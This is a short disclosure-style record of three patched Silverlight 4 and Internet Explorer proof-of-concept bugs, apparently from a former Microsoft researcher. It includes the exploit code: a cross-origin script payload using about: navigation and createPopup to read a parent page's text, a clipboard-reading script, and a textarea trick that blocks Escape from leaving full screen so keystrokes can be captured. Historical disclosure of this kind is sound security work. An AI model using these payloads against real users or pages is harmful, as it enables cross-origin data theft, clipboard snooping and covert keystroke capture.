A collection of proof-of-concept findings from the first Silverlight 4 security assessment. The compiled SL4_PoCs.xap contains the Silverlight-side code; the HTML files demonstrate three distinct issues found during this review.
PoC 01 — UXSS via about: Navigation with createPopup
A <meta http-equiv="refresh"> that navigates to an about: URL with script content can bypass restrictions when a createPopup() popup is used to override the alert method. The popup’s document context is less restricted, allowing the injected script to read parent.document.body.innerText cross-origin.
<meta http-equiv="refresh" content="0;url=about:<script>
var newTrident = createPopup()%3b
window.alert = newTrident.document.parentWindow.alert%3b
alert( 'document.domain = ' + document.domain + '\n' +
'parent.location = ' + parent.location + '\n' +
'parent.document.body.innerText = ' + parent.document.body.innerText
)
</script>">PoC 02 — Clipboard Read
A Silverlight 4 application running in full trust (or with certain elevated permissions) could read clipboard contents directly.
<script>
alert("Here's the clipboard:\n\n" + clipboardData.getData("Text"));
</script>PoC 03 — Full Screen Keyboard Capture
When a Silverlight control is in full-screen mode and a textarea has focus, the Escape key no longer exits full screen. This allows a page to capture keyboard input while presenting a convincingly full-screen experience.
<textarea style="width:500px;height:160px;">
Press the Full Screen button at the very top of this window,
and then write inside this textbox at will.
When the focus is here, you can't get out of fullscreen by pressing Escape.
</textarea>Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.